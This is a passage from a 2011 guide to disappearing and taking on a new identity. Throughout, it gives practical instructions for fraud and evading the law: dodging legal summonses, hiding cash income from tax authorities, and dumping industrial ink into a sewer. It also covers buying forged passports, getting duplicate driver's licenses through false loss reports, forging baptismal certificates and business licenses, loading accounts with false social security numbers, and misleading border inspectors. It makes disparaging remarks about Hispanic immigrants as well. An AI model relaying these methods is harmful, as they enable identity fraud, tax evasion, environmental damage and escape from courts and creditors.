tracks. +Never accept mail that requires a signature. Tell the postman that +you haven't heard from the addressee for over two years and that +the addressee is off chasing grizzly bears around Canada or got a +"calling" and is now an evangelist in Ethiopia or whatever. But +here is where the legal eagles get clever. Instead of sending a +suspicious looking letter, they will now send you a nice large +parcel. +Everyone likes to receive packages and most people are less +likely to be suspicious of a nice large box. Don't fall for the trap. +The box may contain a brick and a legal summons to appear. +If you are handed a certified or registered piece of mail, it might be +useful to know who sent it. Ask that the postman hand it to you so +you can read (and then memorize) the sender. Most mailmen will +cooperate as they hope you'll recognize the sender and agree to +receive the letter. This info can give you a valuable insight into +who is on your trail. +Another trick is to send the legal document through the regular +mail. Be careful what you open. Some have even made the +document envelope look as though it contains a check. This can +be quite tempting. The best strategy is to purchase a rubber +stamp that says "addressee unknown - not at this address - no +forwarding address on file". Stamp any suspicious mail with it and +return it to sender. +Working "Off the Books" +Unless they have accumulated a large bankroll, most new +successful identity-changers have to, for a time, make a living "off +the books". If you can do home improvement work, get an +answering service phone number and a commercial post box (in a +nice section of town) and have a business card printed up so you +look legit. +Offer a one third off discount for cash up front. If your lack of +references is a problem, do the rounds of the local churches (or +smaller charities) and offer your services for next to nothing. After +you have satisfied them with the quality of your work, word of +mouth will send plenty of work your way. (People are greedy and +just LOVE a good bargain - particularly one that breaks the rules) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 158 - +Reproduction in any form is prohibited without written permission. + +And you'll be getting a very valuable reference from the clergy in +the process. +You may even be offered an "off the books" job. Don't be +surprised by this, as even the larger corporations love a bargain +(and are disgusted with government regulation, taxes and unions). +While on the job, try to keep your appearance as professional as +possible. +Be completely honest with your customers as the name of the +game here is trust. Do not ask for salary advances as that +involves trust, which has not yet been established. Small jobs are +the best bets especially early on. Have the customer purchase +building materials if they're willing. They'll be much more willing to +buy materials then to hand over hard cash to a stranger. +Avoid the subject of building permits but if a customer insists on +one, have them do the application. On a larger job be sure to +collect your pay at intervals so as to keep your cash flow in the +black. Don't ever let a single job consume all your time and +capital, as there is always the chance you won't get paid off in the +end. +Some underground workers prefer to file their taxes and report a +portion of their real earnings and skim the rest in cash while others +live entirely underground. As always the choice is yours. But +whatever you do be careful about one detail. When you fill out +your tax forms there is a nasty trap that you should know about. +That silly little box that asks for your profession or job title can be +a killer. If you list your job title as "Contractor" or "Carpenter" you +may run into problems. +The IRS has a hit list of targeted professions, which include all +those that might have hidden cash incomes or unreported tip +income. "Entertainer" is another title to avoid. Under new IRS +guidelines, they will only launch a serious investigation when they +can be sure there is enough money involved to make it profitable +for them. +Even high tech workers can play at this game. One smart fella I +know waltzed into a large discount electronics store and offered +the sales clerks a 15% cash commission on any computer +installation/programming customers they might send his way. +Each new computer customer was asked if they could use some +on-site assistance. After a few test jobs, the guy got so much work +he had to hire other "off the books" workers to keep up with the +backlog. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 159 - +Reproduction in any form is prohibited without written permission. + +There are companies who have materials they badly need to +dispose of. The official disposal programs charge enormous fees +to government approved disposal firms who collect and bury the +stuff in government approved underground vaults. +But despite all the rules, many institutions are seeking a less +expensive solution. Someone who could pick up a few drums of +the stuff several times a week and make it disappear with no +questions asked could make some serious money very quickly. +Where the stuff ends up is of no interest to them. +Banks, for instance, use computerized machines that spray +fluorescent and black inks on the back of our checks during their +processing. Unfortunately for them the machines produce a +steady flow of waste ink. One guy would pick the stuff up each +Tuesday and Thursday evening (around 9pm was the best pickup +time as few people are around then) and run it out to a suburban +industrial park that had a large sewer drain located in a poorly +lighted area. +Five hundred bucks cash for five hours work and the stuff wasn't +really all that dangerous. Deals like this are around if you can +find them. And when you satisfy one customer don't be surprised if +several more look you up. +Surfing the Web +If you look around the web you’ll find several pages that provide +access to the social security administrations death database +(SSDI- Social Security Death Index) I’d provide you with the +current URL but it’s constantly changing so it’s best that you use +one of the search engines to locate it yourself. +If you look at the private investigator pages you'll stumble on +pages that provide a free social security number lookup feature. +You enter the SSN and it gives you the state and year of issue +and confirms that the number was officially issued. +You do not get a name or any other info unfortunately. This is the +same check most banks use so this information can be quite +valuable for your purposes. +There's also the new Mormon family research database at +www.familysearch.org. You'll find a ton of dead people (and many +that are still alive!) listed in their extensive database. I was +shocked to find myself and both of my parents (both still living) +included in their listings. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 160 - +Reproduction in any form is prohibited without written permission. + +But be warned that you may have to verify the information you find +here. Well-meaning individuals that sometimes get their facts +wrong have entered much of it. I'd guess that between 5 and 10% +of the information is incorrect so be careful. +Passports +As I said in the 2011 update, the best place to obtain a passport in +another name is Bangkok, Thailand. Just be careful as you’ll be +dealing with some unsavory and potentially violent types. +If you do jump into these waters, be very careful to play it very +straight. Pay what you say you’ll pay and don’t get upset if you get +ripped off the first time around. Eventually you’ll find yourself led +into a room where several dozen passports will be spread out on a +table ready for purchase. +Since a US passport is issued by an agency of the US federal +government, it's the most influential and widely respected form of +ID an American can carry. (If you don't believe this try getting back +into the US after an overseas trip with your drivers license and see +how far you get.) A US passport is accepted almost everywhere. +I've received dozens of reports from readers that the US State +Department no longer bothers to verify the existence of a birth +certificate in a vital records office before issuing a passport. +And the US passport is a very interesting form of ID. It's the single +most credible form of ID even though it contains very little +information. Yes it does have your picture (digitized so it can't be +easily altered) and your name and birth date. No social security +number, no address. Anyone who claimed to have lived overseas +would have a current US passport in their pocket. For this reason +you should obtain one and keep it with you at all times. It's a very +useful kind of ID that doesn't reveal too much information. +This tip was recently provided by an identity-changer in New +Jersey. To escape an unpleasant situation, this lady along with +several friends had booked an extensive European tour through a +local travel agency. About a month before her departure she +stopped by her local post office to pick up a passport application. +Suddenly she remembered her mother telling her some years +back that, due to her father's strict religious beliefs, her birth was +never properly registered. She feared that since she had no birth +certificate on file - she probably wouldn't be able to get the +passport she would need for her trip. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 161 - +Reproduction in any form is prohibited without written permission. + +She quickly phoned the US Department of State in Washington to +see what could be done. She was told that her situation was not +unusual. (Again, a substantial percentage of the people you see +walking down the street have never had a birth certificate entered +into the official files) All she had to do was request a copy of her +birth certificate from the proper vital records office. +The state department would perform a search and, of course, +would find nothing. They would then send her a form indicating +that no birth certificate had been found. (This is usually a very +simple photocopied form with a large "X" in a box next to the +relevant statement) +According to State Department rules this document would prove +that she had made an official attempt to obtain her birth certificate +and that additionally no birth certificate was on record. The State +Department bureaucrats will accept the official rejection form in +place of an actual birth certificate! She did as they requested and +got her passport right on schedule as promised. The forms seem +very hard and fast as to which documents they'll accept but in +reality there's a lot of flexibility in their requirements. +Passport Update +According to a recent news report the US immigration and +naturalization service (INS) is having a hard time keeping +illegal aliens, drug dealers and terrorists out of the country. +In December 1999 alleged terrorist Ahmed Ressam was +arrested when he attempted to enter the US using false +travel documents. Though they stopped him, INS officials +have admitted that controlling who gets in and who doesn't is +becoming a very difficult challenge. +During the year 2004 the government counted over 500 +million individuals who entered the US through 200 points of +entry and if even two percent of them did so illegally, that +adds up to over 10 million people! +First there is the issue of passport forgery. For around +$5,000 an expertly altered US passport can be purchased +overseas. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 162 - +Reproduction in any form is prohibited without written permission. + +Though the US Department of State is now issuing a new +higher-tech passport. (Which includes new high tech security +features including a digitized photo that's bonded right into +the page rather than the much easier to alter stuck-on photo) +Passports issued through US embassies abroad continue to +use the more vulnerable stuck-on photos. +And to make it even more difficult for the government - the +US now admits citizens from 29 different countries without a +visa. So all an illegal has to do is create a forged birth +certificate from one of these approved countries and then +obtain either a genuine or an altered passport from that +country. This is exactly what Ahmed Ressam did. France +was the country he chose. +According to a top INS official - "for the vast majority of +passport applications in Canada and the United States, they +do not do background checks or even check the birth +certificate authenticity." +Since US birth certificates are issued in over 1,000 different +formats at 7,000 different offices, it's very difficult to be sure +they're dealing with a genuine document. US department of +state officials used to contact the office that issued the birth +certificate to verify it's authenticity but unfortunately +insufficient funding has kept these offices ridiculously low- +tech so verification can take weeks or even months. (Clerks +have to manually search through huge drawers of paper +documents) +This is far too slow to allow efficient verification. At some +point in the future this entire system will be fully automated +and will allow fast online verification, but for the foreseeable +future forgery is an effective option. And given the huge +increase in the number of people traveling these days, the +issuing authorities are feeling a bit swamped. +Though I've received reports that US citizens have been +arrested for past crimes when they attempted to enter the +US, highly placed state department officials tell a different +story. They report that the department uses two different +databases when they look you up at passport control at an +entry point. Neither talks to the other. And neither one talks +to the federal NCIC computer where all the arrest warrants +reside. The INS commissioner has promised to correct these +deficiencies but progress seems painfully slow. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 163 - +Reproduction in any form is prohibited without written permission. + +Here is how bad the situation really is. In June of 1999 an +alleged Mexican murderer, Angel Reyes-Resendiz was held +and then released by the INS even though the FBI was +conducting a nationwide manhunt for him! (he was number +three on the FBI's ten most wanted criminals list!) Talk about +one hand not knowing what the other is doing! +Buying a Car +Never buy a car and have it registered using your home +address and phone number. Instead you'll need to cover +your tracks. One easy way is to buy a used car and have a +business name listed on the bill of sale. This should allow +you to register the tags and title in the business name. If +you're asked for a business license, there have been those +who have fabricated one using one they found on the web. If +it's from out of state, it will be very difficult to trace and verify. +If you have a nice employee ID, it will help smooth the path. +Today most new car dealerships are eager to lease cars +rather than sell them outright. They make more money with +leasing because they know you have to come back and +lease another every three years or so. Leasing is seldom a +good deal except for those who have to have the latest +model or for small businesses who can write the vehicle's +costs off on their taxes. Either way it shouldn't be too difficult +to lease a new car in a business name. +Of course you'll be asked to sign a personal guarantee on +the financing but that's par for the course. +It almost goes without saying that you should change the +kind of car you usually drive. If you're addicted to little red +sports cars, now would be the time to buy a big blue Ford. +Stay away from your usual kind of automobile. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 164 - +Reproduction in any form is prohibited without written permission. + +Skip tracers and other snoops are in the habit of tracing +vehicle transfers. You transfer your title from Virginia to +Colorado and all your hard work goes down the drain as the +transfer is fully documented in a public record that is easily +searched. +Rookie Mistakes +Here are some basic mistakes many freedom-lovers have +made that "blew their cover". Avoid these like the plague. +Pre-vanish Planning +- Need to do some surfing to get your facts together before +departure? Do that surfing at an Internet cafe or at the +library. Don't do it from your home PC. +- Don't make calls related to your coming departure on your +home phone. Instead purchase a prepaid cellular phone. +Only make your usual calls on your home phone and make +all calls relating to your upcoming vanishing act on the +cellular. When you're ready to take the plunge, crush the +cellular phone completely and discard it and buy another +when you arrive in your new city. Do not give your new +prepaid cell phone number to anyone. All you have to do is +make a single phone call from your home phone (or a +relative's phone) to your new city and you will have provided +any snoops with a 24 carat solid gold link which they will use +to blow your cover. +- Do not call your old doctor from your new location to +request medical records. If you can, abandon your old +records but if you must have them, tell your doctor you're +leaving town and aren't sure where your employer will +eventually place you so you need to take the most relevant +records with you. If you have to promise to return them, do +so. +- Never attempt to change the address on a magazine +subscription from your old address to your new one. Sounds +stupid but many a vanisher has been tripped up in just this +way. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 165 - +Reproduction in any form is prohibited without written permission. + +- Do not rush your pre-vanish planning. Take at least several +months. The longer the better as long as you don't forge +links between your old and new selves. +- Confide in no one, no one at all. Do not change your daily +routine. Go about your business as normally as you can. Do +not alter your personal relationships. These should also +appear normal. +- You can call accounts up and "correct" the social security +number they have on file. Confirm that the number is correct +and use the occasion to change the number. Don't change +the first three numbers however (unless you want to appear +to have come from some other distant state). You can load +account files with misinformation with a series of phone calls. +- If you're really serious about vanishing, you can setup a +foreign mail forwarding service right on the Internet. Just do +a search for "foreign mail forwarding" on google and select +one. Unfortunately their services don't come cheap but you'll +have an address that is entirely untraceable. This address +can then be used as an intermediary address between you +and your offshore bank. +- Go to www.jfax.com and get an online fax number. For a +few bucks you get an untraceable fax phone number. When +you get a fax they send you an email notice. Nice service +and it's secure. Give them junk info or misinformation when +registering. Give them only a Yahoo, Hotmail or Ziplip email +address. +- When you order your prepaid cellular phone, ask if they will +issue you a number in some distant area code. Many cell +companies will offer this service. If they charge a few more +bucks - cough it up as it's a bargain. +- Once in your new area, demolish your cellular phone every +two months or so and replace it preferably with one with +some other area code. Your calling location will remain a +mystery. +- Rent a storage locker and place a very good lock on it. +Place all the materials that might reveal your plans in it. On +the morn of your vanishing act visit the locker, destroy +everything and discard it when you get out of town. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 166 - +Reproduction in any form is prohibited without written permission. + +- A Nevada, Wyoming or Delaware corporation is a handy +thing. You can rent mailboxes and open bank accounts all in +your corporate name, which makes it much harder to track +your activities. +- When you open your corporate bank account do not give +them your new phone or address. Use a dummy address +and give them a invalid phone and say "the phone won't be +installed for a few days yet". Do not give them your new +prepaid cell number as it's activity can be traced. +- Do all your new banking through the ATM or online. Avoid +showing your face inside the bank. +- During your last months at your old location you might want +to consider using whatever frequent flyer miles you have to +take a vacation. But be sure to travel to a place distant from +your intended new location. Any other frequent flyer miles +should be abandoned as they create a simple to track link. +- Forget library cards and registering to vote (though you can +easily register under a fake name and use the card as useful +new ID). +Remember, fail to plan and you can plan to fail. Take your +time. Pay attention to details or it will all add up to nothing. +Witness Protection Program +Taking a look at the federal witness protection program may +give you some tips on how one might pursue a new identity. +Under the witness protection program, those who are willing +to testify against major criminals are provided with entirely +new identities by the federal government. +The following comes from several people who were actually in the +program. After you're approved and provide the testimony they +require, you're given your new identity. First you're stripped of +every form of ID you have in your present name. Then you're also +stripped of any other piece of paper that has your old name on it. +Until you actually appear in court you may be ferried around from +hotel to hotel for up to a year. It's a real grind and the feds may +abandon you if the prosecution isn't successful for whatever +reason. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 167 - +Reproduction in any form is prohibited without written permission. + +Then you're provided with a set of five or six airplane tickets and +several sets of temporary ID. You're given a schedule for several +airline flights that will route you all over the nation. Each individual +ticket bears a different name. +The first leg of your trip might take you from Miami to Dallas as Mr. +Miller. You stay in a hotel as Mr. Chambers. Two days later you fly +to Kansas City as Mr. Wilson and stay in a hotel for two days as +Mr. Mallory. +Then you fly to Denver as Mr. Anderson, stay there two days as +Mr. Phillips and then onto your final destination, Phoenix, Arizona +under your permanent new name. +There you visit a hidden facility on a military base where security +is extremely tight. You are provided with a full set of ID in your +new name. You practice your new signature and telling your new +personal history story until you can recite it smoothly without any +anxiety. If you have a regional accent, this can be a problem. Your +new life story will have to explain it away in a believable way. +All this flying around is necessary as it completely breaks any link +between your old and new identities. Anyone checking up on you +won't be able to track you as each flight and hotel reservation is +under a totally different name. +You can choose your new name but there are limits. No celebrity +names, no names of old friends or any name that in any way links +you back to your old identity. You can also choose which city you +want to live in, up to a point. Almost everyone wants to go to either +Hawaii or San Diego so these areas are not options. Almost +everyone also wants a sunny warm location, which is seldom +granted. Obscure places in small to medium sized cities located in +the northern half of the country seem to be most often used. +And another ban - you can't go anywhere where you have friends +or relatives. You have to be a complete unknown in your new +location. You will be provided with a "small stipend" for the first +few months but you will be forced to seek employment after that. +If you are uncooperative about seeking a job, you can be dropped +from the program. Uncle Sam isn't going to take care of you for +the rest of your life. +At first, most new entrants in the program are miserable. They +miss their friends, their old haunts, their families, everything +familiar. They are in a new environment that is entirely foreign to +them dealing with people with far different values and habits. In +short, they are fish out of water. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 168 - +Reproduction in any form is prohibited without written permission. + +Even after all this - you can have problems. You can never apply +for a job that requires any kind of background check as your +working history won't stand up to close scrutiny. (It exists only on +paper) +You will also have to avoid any job that requires a security +clearance or a pre-employment polygraph test. All things +considered, you're actually living a lie so any careful examination +of you and your life will soon blow your cover. +Divorce is common, especially during those first months that +precede your court appearance. Here you are, your whole family, +crowded into a single hotel room for months and months moving +at random times into strange places. You're warned not to step +outside but how can you live cooped up for so long? Angers will +flare and old arguments will resurface. It's just human nature. +Though the government does all it can to facilitate the whole +process, a substantial percentage of program entrants drop out, +especially during those first months. Many former criminals can't +resist the temptation and return to their criminal ways in their new +location. +This is cause for immediate ejection from the program. Some get +homesick and phone up an old buddy - another stupid move that +will get you terminated. +Most people stay in the program for 2-3 years and then just walk +away. For some it's a good move but the stakes are high as those +who miscalculate can end up six feet under. Some have been +kicked out just for making the mistake of signing their old +signature or when their children spill the beans to their friends. +One man felt bound to attend his daughter's funeral – another +common mistake. +There must be a thousand different ways to blow your cover and +most people become fatigued with the constant anxiety. Being +always on guard must be draining. The least little slip could be all +your old enemies need. +One Call Does It All? +If you sniff around the web long enough, you'll run into +entrepreneurs that will offer to handle the whole identity-changing +process for you. For a up-front single fee (usually two to five +grand) they will get you a clean new birth certificate, drivers +license and may even throw in a passport and credit card. It +© Copyright 2011, Ariza Research, All rights reserved - ABP - 169 - +Reproduction in any form is prohibited without written permission. + +sounds inviting to let someone else who knows the ropes handle +the whole process while you sit back and relax. +They seem to be rather underground and probably associated +with the criminal world as they only communicate via email and +perhaps a phone call or two. +It all sound so inviting that you send this guy cash or a money +order for a grand or two and sit back confident that soon you’ll be +somebody new. Two weeks later when you send him a reminder +note, your email message comes bouncing back with an +"Addressee Unknown" error attached to it. This bird has flown. +These guys are con artists plain and simple. They're long on +promises and very short on performance. Untraceable foreign +email accounts are a dime a dozen (actually they're entirely free!) +Even if they do ship you some identity documents, you can bet +they'll be either stolen or of very poor quality. Or if you get an +"honest" con man, he may charge you two grand for a camouflage +passport that costs him a mere $200. +Or perhaps he'll sell off your new identity info to some law +enforcement types. There are no easy shortcuts here - identity +changing is best done alone. +Some Other Passport Strategies +The US passport application process requires a personal +interview with a certified passport processor at a post office +facility. Though you may get a bored and disinterested clerk, +never underestimate these people. They are carefully trained +and most are extremely adept at uncovering deception. They +also have radar when it comes to forged documents. +Avoid applying in the big cities near international borders +and locations in the southern US where Illegal Hispanic +aliens are common. +Be prepared for questions, some of which are designed to +shake you up. They're looking for nervousness. So they may +ask silly questions that have nothing to do with your ability to +obtain a passport. Be calm and if asked for nonsense +information simply (and calmly) say "Gee, I don't know". +© Copyright 2011, Ariza Research, All rights reserved - ABP - 170 - +Reproduction in any form is prohibited without written permission. + +Getting a Second Drivers License +Most states will allow someone to obtain a replacement +drivers license when the original has been lost. As of 2011 a +few states have begun to discuss requiring a police report +documenting the loss before they’ll issue a replacement. +But for now that’s just in the discussion stage so a +replacement today can be had with very little hassle and for +a very modest fee. +Many college students over the age of 21 are obtaining +duplicates for their friends to use for purposes of underage +drinking. It’s a very widespread practice at major universities +nationwide. +You can obtain a second drivers license by the following +method. First, if your DL is anywhere near expiring, renew +your license in the usual way. If you are given a choice on +how long your new license will last, go for the max, even if it +costs you a few extra bucks. +Wait a few months and then call your local DMV office and +report your DL lost. After having dinner with friends you +remember dropping your wallet but you thought you picked +everything up but obviously not. You have lost your license +and need a new one. You are issued a replacement license. +This is a very common procedure these days. +Then you call the DMV office in the state you wish to issue +your new license - ask if testing is required or will they +accept your old license instead. Most will accept your old +license. Then you drive to your new location and apply for a +new license there, handing in your old original (Not the +replacement) license. +You now have two licenses in two different states. This can +be useful to help cloud the issue of where you live, to help +you document the "fact" that you live in the lower taxed state +or help you qualify for a lower tuition rate for state residents. +Unfortunately since all 50 states now share information on +DUI, speeding ticket points, suspensions and revocations, if +your license has been tagged in any of these ways, this +whole process will only get you into more trouble. Sorry. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 171 - +Reproduction in any form is prohibited without written permission. + +Legal Eagles +We get inquiries all the time asking if a lawyer could handle +an identity change for a fee. The answer is - unless your +present situation is 100% legal and moral - forget it. +Attorneys are loyal to the courts and cops they plan to be +working with for years to come. In contrast, clients come and +go. If a lawyer smells even the slightest problem - you can +expect that most of them will turn you in a heartbeat. +And very few lawyers know anything about identity changing. +When you finish reading this report you'll know more than +98% of them. +In contrast a Private Investigator (PI) can, in some situations, +be useful. Problem is - you have to find one you can trust +completely and that's a very difficult hurdle. If you can get a +solid personal reference from a trusted friend - you might +have found your man. Your average PI has access to a ton +of otherwise unavailable information. +And the best of them have extremely sneaky ways of getting +to the really heavily restricted info but don't expect them to +share their secret techniques. It's taken them a lifetime to +develop them and to a PI they are as valuable as the secrets +of a master magician. +Big Brother and Your Friendly Local Travel Agent +I love my country but the way our government treats it's +citizens makes me sick to my stomach. But it's amazing to +me how blindly most people trust our government. If they +knew the truth they'd be much more suspicious. +You drop in on your friendly local travel agent. You make +some reservations and purchase your tickets. The whole +process is easy, pleasant and you assume (quite wrongly) +that your travel plans are no one's business but your own. +Unfortunately, all reservations made in the US are handled +through a unified system that is closely monitored by - yup +you guessed it - the federal government. +A businessman forms a corporation in a secretive offshore +tax haven. He then makes reservations and flies down to his +© Copyright 2011, Ariza Research, All rights reserved - ABP - 172 - +Reproduction in any form is prohibited without written permission. + +new location to soak up the rays and check his rapidly +expanding tax-free bank balance. +A few weeks after his return home he receives a notice from +the IRS informing him of an upcoming audit. Could it be that +the IRS knows about his offshore dealings? You bet they do. +Any reservation made through any travel agent located in +the US is an open book. The IRS has compiled a list of 31 +offshore tax havens. When a US citizen takes several trips to +one of the offshore locations on their list - bad things begin +to happen. First your luggage may be torn apart by US +customs upon your return to the US and then the IRS may +place your entire tax history under a microscope. Several +years of annual tax audits follow. But some have found that +all this insanity can be avoided. +The easiest way is to fly to Canada and purchase your +overseas tickets there (don't use your frequent flyer program +if you're interested in staying off big brother's radar). +Or others have found this approach worthwhile. When you +make your reservations, convince your travel agent that +Mexico City, Costa Rica or Puerto Rico is your final +destination. Of course this trip is for tourism purposes only. +Tell them how much you're looking forward to spending +some time shopping and taking in the sights. +Or perhaps you enjoy photographing the many kinds of +tropical wildlife found there. Be very careful not to say +anything about any other travel plans. You'll be staying with +some friends there so won't need any hotel or rental car +reservations. +When you arrive at the airport there, you walk over to a +different airline's counter and purchase a ticket to your real +destination - an offshore tax haven. You pay for the ticket in +cash. +When you get to your final destination you avoid using your +credit card and also refrain from calling home unless you use +one of those international calling cards that can be +purchased for cash. (When the calling card has expired - +destroy it completely - Do not "recharge" it with your credit +card). Take enough cash with you to last through your entire +stay (unless you have some funds tucked away there). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 173 - +Reproduction in any form is prohibited without written permission. + +Some Caribbean offshore locations will allow Americans to +visit their countries without showing their US passports. I +recently entered the Bahamas with only my Tennessee +driver’s license. The lady just waved me through with hardly +a glance. +The government there is more interested in getting your +cash than hassling you with security problems. This will work +well if you are an affluent looking American. +Gee, do you think anyone ever opened an offshore account +using one of those nifty camouflage passports? I've received +no new reports but I can imagine it's been tried. +One other thought to keep in mind is that the single most +dangerous threat to your privacy are the credit bureaus. We +live in the most computerized society in the history of the +world and these credit bureaus have many sources. But +when you travel overseas you drop off their radar +completely. +The credit datahounds receive no input from foreign sources +nor do they provide any data to overseas firms. The US +credit bureaus have no influence over transactions in foreign +countries. Your US credit rating is entirely worthless there. +Drivers License Madness +The suicide high-jackers who hit on Sept. 11 all had US +driver’s licenses. After the attack DMV officials all over the +country came under fire for issuing drivers licenses too +easily. The states that were the most lenient in the issuing of +new drivers licenses were Tennessee, Utah, and Virginia. +For several decades migrant workers and other illegal aliens +have known that Tennessee is the state that grants drivers +licenses most easily. The reasons behind this are simple +enough to grasp. +The democratic parties in these states have passed motor- +voter bills that automatically register new driver license +holders to vote. +Since Tennessee doesn't even ask for a social security +number as a part of the license application service, you +might wonder why new licensees would automatically be +registered to vote. Simple - the politicians want it that way. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 174 - +Reproduction in any form is prohibited without written permission. + +The more voters get registered, the better. It doesn't matter if +they aren't entirely legal. It doesn't matter if they're not +qualified. Don't ask questions - just sign 'em up! +Another issue revolves around these state's ongoing need +for Hispanic labor to work in the agriculture industry. They +want Spanish-speaking illegal aliens to come to their states +as it fattens the cheap labor pool. +Indeed, not only don't you need a social security number to +get a license in Tennessee and several other states but the +application and written test can be taken in Spanish or any of +a half dozen other languages. (Gee, how can a Spanish- +speaking foreigner drive safely when they can't read the +street signs?) +When interviewed concerning their lax procedures, the +director of the Tennessee drivers license system said that +their policies were under review but they didn't anticipate any +changes anytime soon. +According to recent news reports Connecticut, South +Carolina and Florida no longer accept Tennessee drivers +licenses for conversion. +Anonymous Foreign Free Email Services +Below are links to various foreign free email services. With +them you can open a free email account and use it to +communicate anonymously with anyone anywhere in the +world. Your messages cannot be traced. [All services on the +list were verified 3-03] +http://www.ireland-information.com/freeemail.htm +http://www.mailasia.com/scripts/common/index.main?=us +signin=1&lang +http://www.timormail.com/ +http://www.emailgaul.com/email/scripts/loginuser.pl +http://www.anjungcafe.com/ +http://www.flytecrew.com/ +© Copyright 2011, Ariza Research, All rights reserved - ABP - 175 - +Reproduction in any form is prohibited without written permission. + +http://www.kichimail.com/templates/common/us/tos.htm +http://www.norikomail.com/templates/common/us/tos.htm +http://mail.wawasan2020.com/email/scripts/useragreement.p +l +http://server1.mymail.ph/email/scripts/loginuser.pl +http://philippines.to/ +http://www.singmail.com/ +http://mail.bkkmail.com/templates/common/us/tos.htm +http://vol.vnn.vn/cgi-bin/webmail4.2/register? +REGISTER=TRUE&INTERFACE=E +http://www.asia-links.com/members/register.asp +http://www.eastmail.com/ +http://www.fepg.net/foreign.html +http://www.email.is/login.asp +http://www.operamail.com/templates/common/us/tos.htm +Re-entering the USA +Ok so you've been overseas for a while for whatever reason +and are now ready to come back home. For the vast majority +of returning citizens this is a routine process that goes +smoothly but a bit of planning and knowledge will help you +avoid any problems. +First of all, dress conservatively. You must look like a nice +honest citizen returning from a vacation or business trip. Do +you remember all that legal stuff they taught you back in high +school civics? And do you recall all that mumbo-jumbo about +cops needing a search warrant to look at your property. And +that stuff about you being innocent until proven guilty. +Remember? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 176 - +Reproduction in any form is prohibited without written permission. + +Well, when you cross a US border - forget it - none of that +applies! The inspectors who question you have a legal right +to look wherever they please (this includes strip searching +you, plowing through your baggage and even disassembling +your car). And they can put you through living hell on nothing +more than a "hunch". They don't need evidence. +If they suspect something is wrong - the burden of proof is +on you. You have to, by law, answer any questions they care +to ask for as long as it takes. That's right - you are guilty until +you prove your innocence to their satisfaction. +This is all because the US Supreme Court has decided that +crossing a border is a voluntary act so the usual +constitutional protections don't apply. +If all goes well you should be in front of an inspector for less +than one minute. If the conversation lasts longer than that, +you'll probably end up going through a second much more +detailed inspection (called a "secondary"). +Be nice and friendly in answering any questions. If you do or +say anything that irritates the inspector, remember - he is a +position to make your life a living hell. +These inspectors have an extremely boring job so do +everything you can to make things go smoothly and they will +reward you with a quick and easy transaction. Inspectors are +not nasty bastards who are dead set on causing you +headaches. +Instead they're just regular people who want to keep the line +moving as quickly as possible. Most of what they say and do +is repeated over and over again so they operate in a kind of +fog. And never assume that they're stupid as they're not. +Your chances of fooling an experienced inspector are +remote so don't even try. +Here is something any American should consider. Before +you leave make good quality photocopies of your birth +certificate and all pages of your passport. +Should you lose your passport while overseas you could +quickly find yourself in a rather sticky situation as the State +Department requires a birth certificate verification before a +replacement can be issued. If you have a copy of your +original passport, the verification is unnecessary. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 177 - +Reproduction in any form is prohibited without written permission. + +The inspector has the right to search your wallet (or purse) +either in front of you or in another room. Also be sure not to +have receipts for items purchased while overseas. +Inspectors have dual responsibilities. They are both an +immigration agent concerned with illegal aliens entering the +US and also have customs responsibilities. +Do not carry any prescription drugs with you that would +indicate that you suffer from any serious infectious or mental +diseases. They are a dead tip-off that you have a problem +and there are rules against letting seriously sick people into +the US. If you act strangely, you may have earned yourself a +second conversation with a public health type who may well +refuse you entry. +Needle tracks and drug paraphernalia are another tip-off that +will get you and your baggage torn to shreds in a frantic +search for illegal drugs. +If you're traveling with a friend but want to appear as +separate travelers, be sure to act like strangers from the +moment you enter the building. Don't even glance at each +other. While in line you are being carefully watched and any +indication of communication will result in a more in-depth +investigation. +If anyone in line starts up a conversation immediately +assume that they are government agents who are attempting +to pump you for information. Keep the conversation light. Do +not respond in any way to probing questions. +The inspector may ask you if you've ever been arrested. If +he doesn't believe your answer he may launch into +something like the following: "I suspect you of being involved +in illegal activities. I am of the opinion that you have been +arrested in the past. Now we can detain you and search the +records or you could just come clean right now and you can +be on your way." +This is a trap. His threat is probably an empty one. Admitting +to a felony arrest is grounds for denying you entry (agents +call this "dumping" an applicant). Or he may ask you if you +have any minor arrests like traffic offenses or other minor +crimes like burglary. If you admit to being arrested for +burglary - you will probably be immediately dumped. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 178 - +Reproduction in any form is prohibited without written permission. + +The inspector’s motto is - small lies mask large lies. Don't +ever attempt to carry over $10,000 in cash out of the +country. The new money has coded strips that can be +detected. +Those who smuggle large sums use either large +denomination bills (Singapore has a single bill that's worth +over $8,000 and diamonds or other expensive gems or +jewelry are another highly-liquid forms of portable wealth that +can be easily converted to any currency you like almost +anywhere in the world. +Baptismal Certificates +I just thought I’d include a note here about baptismal +certificates. It’s simply amazing how often someone will +accept a simple forged baptismal certificate. After all it’s not +an official government document in any real sense and as +such isn’t readily certifiable. +And if you add a raised seal using the strategies discussed +above, you will have an ID document that can be quite useful +though extremely easy to come up with. I recommend you +make one up and have it with you when you are seeking +other ID documents. +Blank baptismal certificates can be purchased at church +supply stores but you may have to buy a pack of a hundred +just to get one. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 179 - +Reproduction in any form is prohibited without written permission. + +Also, you can buy a wallet-sized "certificate of ordination" +proving that you are a reverend in one of several "churches". +You can find these outfits listed in the classified section of +the "National Enquirer" which you can find at your local +grocery store. For $5 you’re a reverend, for $10 a Priest and +for $50 you can be a real Bishop! Note: forget the ads you +see there that offer blank drivers licenses and other fake ID. +It’s all real junk. Looks like some high-school kids made the +stuff up. +Phone Numbers of Vital Record Offices +Alabama (334) 206-5418 +Alaska (907) 465-3391 +Arizona (602) 255-3260 +Arkansas (501) 661-2336 +California (916) 445-2684 +Colorado (303) 756-4464 +Connecticut (860) 509-7897 +Delaware 